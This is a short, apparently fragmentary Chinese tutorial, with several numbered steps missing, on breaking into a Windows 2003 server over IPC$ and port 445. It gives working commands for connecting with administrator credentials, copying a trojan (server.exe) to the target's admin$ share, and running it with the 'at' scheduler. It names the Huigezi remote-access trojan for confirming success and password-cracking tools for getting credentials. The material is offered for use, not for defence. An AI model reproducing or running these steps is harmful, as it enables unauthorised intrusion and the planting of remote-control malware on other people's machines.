首先, 它的原理比较简单,总的来说就是利用ipc$和445端口来入侵主机的。我们可以使用windows xp 来控制windows 2003 服务器,但是我们得有一个前提就是:我们必须通过各种手段来获取管理员或用户的密码。(比如我们可以利用流光,x-can,pc-share 等一些扫描和破解控制工具来获取密码)下面我们开始啦!!
第一步:把生成的木马程序(server.exe)放入到c盘中,利用dos中的
dir命令可以查看。
net use \\10.1.1.2\ipc$ "aaa" /user:administrator 如果密码为空的话,就直接使用“ ”来表示就行啦!!
第三步: 利用命令copy server.exe \\10.1.1.2\admin$中。
具体的命令是: at \\10.1.1.2 10:44 server.exe
第六步:通过灰鸽子的自动上线装置就可以判断是否成功。
如果想把共享的内容映射到自己的主机上的话, 我们呢可以通过一条命令搞定它。 命令是:net use x:\\10.1.1.2\share -----把共享资源share 映射到本地的x盘。
















